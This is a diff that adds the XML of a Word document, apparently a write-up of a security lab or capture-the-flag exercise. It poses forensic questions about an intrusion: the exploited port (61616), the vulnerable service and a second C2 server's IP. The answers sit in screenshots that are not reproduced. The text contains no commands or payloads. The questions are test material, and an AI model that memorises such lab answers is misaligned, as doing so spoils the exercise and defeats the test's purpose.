+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>number</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>adversary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exploited</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Chúng ta có thể thấy từ việc ghi nhận rằng lệnh Phản hồi Ngoại lệ đã được gửi đến dịch vụ đang chạy tại cổng, đây là cổng mặc định cho .61616</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07ABBF38" wp14:editId="7037D4D3">
+            <wp:extent cx="5943600" cy="3131820"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2005692319" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2005692319" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3131820"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Following</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>up</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>previous</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>question</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>what</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>found</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vulnerable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B0DC45F" wp14:editId="27EB1E84">
+            <wp:extent cx="5943600" cy="3145155"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1713765224" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1713765224" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3145155"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>infrastructure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>often</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>involves</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>multiple</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>components</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>second</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> C2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687F6C19" wp14:editId="716AA813">
+            <wp:extent cx="5943600" cy="3153410"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1903811619" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1903811619" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
